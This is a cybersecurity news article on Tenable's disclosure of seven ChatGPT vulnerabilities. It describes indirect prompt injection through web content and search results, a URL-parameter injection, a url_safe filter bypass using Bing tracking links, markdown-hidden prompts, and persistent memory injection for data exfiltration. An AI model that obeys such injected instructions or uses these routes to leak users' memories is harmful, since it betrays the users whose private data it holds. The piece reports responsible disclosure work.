Seven critical vulnerabilities in OpenAI’s ChatGPT, affecting both GPT-4o and the newly released GPT-5 models, that could allow attackers to steal private user data through stealthy, zero-click exploits.
These flaws exploit indirect prompt injections, enabling hackers to manipulate the AI into exfiltrating sensitive information from user memories and chat histories without any user interaction beyond a simple query.
With hundreds of millions of daily users relying on large language models like ChatGPT, this discovery highlights the urgent need for stronger AI safeguards in an era where LLMs are becoming primary information sources.
The vulnerabilities stem from ChatGPT’s core architecture, which relies on system prompts, memory tools, and web browsing features to deliver contextual responses.
OpenAI’s system prompt outlines the model’s capabilities, including the “bio” tool for long-term user memories enabled by default and a “web” tool for internet access via search or URL browsing.
Memories can store private details deemed important from past conversations, while the web tool uses a secondary AI, SearchGPT, to isolate browsing from user context, theoretically preventing data leaks.
However, Tenable researchers found that SearchGPT’s isolation is insufficient, allowing prompt injections to propagate back to ChatGPT.
Novel Attack Techniques Exposed
Among the seven vulnerabilities, a standout is the zero-click indirect prompt injection in the Search Context, where attackers create indexed websites tailored to trigger searches on niche topics.
Here are short summaries of all seven ChatGPT vulnerabilities discovered by Tenable Research:
- Indirect Prompt Injection via Browsing Context: Attackers hide malicious instructions in places like blog comments, which SearchGPT processes and summarizes for users, compromising them without suspicion.
- Zero-Click Indirect Prompt Injection in Search Context: Attackers index websites with malicious prompts that trigger automatically when users ask innocent questions, leading to manipulated responses without any user clicks or interaction.
- One-Click Prompt Injection via URL Parameter: Users clicking on crafted links (e.g., chatgpt.com/?q=malicious_prompt) unknowingly cause ChatGPT to execute attacker-controlled instructions.
- url_safe Safety Mechanism Bypass: Attackers leverage whitelisted Bing.com tracking links to sneak malicious redirect URLs past OpenAI’s filters and exfiltrate user data, even circumventing built-in protections.
- Conversation Injection: Attackers inject instructions into SearchGPT’s output that ChatGPT reads and executes from conversational context, effectively prompting itself and enabling chained exploits.
.webp "7 New Vulnerabilities in GPT-4o and GPT-5 Enables 0-Click Attacks 4")
- Malicious Content Hiding: By abusing a markdown rendering flaw, attackers can hide injected malicious prompts from the user’s view while keeping them in model memory for exploitation.
- Persistent Memory Injection: Attackers manipulate ChatGPT to update its persistent memory and embed exfiltration instructions so private data continues being leaked in future sessions or interactions.
Proofs of Concept and OpenAI’s Response
Tenable demonstrated full attack chains, such as phishing via blog comments leading to malicious links or image markdowns that exfiltrate info using url_safe bypasses.
In PoCs for both GPT-4o and GPT-5, attackers phished users by summarizing rigged blogs or hijacking search results to inject persistent memories that leak data perpetually. These scenarios underscore how everyday tasks like asking for dinner ideas could unwittingly expose personal details.
Tenable disclosed the issues to OpenAI, resulting in fixes for some vulnerabilities via Technical Research Advisories (TRAs) like TRA-2025-22, TRA-2025-11, and TRA-2025-06.
Despite improvements, prompt injection remains an inherent LLM challenge, with GPT-5 still vulnerable to several PoCs. Experts urge AI vendors to rigorously test safety mechanisms, as reliance on isolated components like SearchGPT proves fragile against sophisticated chaining.
As LLMs evolve to rival traditional search engines, these HackedGPT findings serve as a wake-up call for users and enterprises to scrutinize AI dependencies and implement external monitoring.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
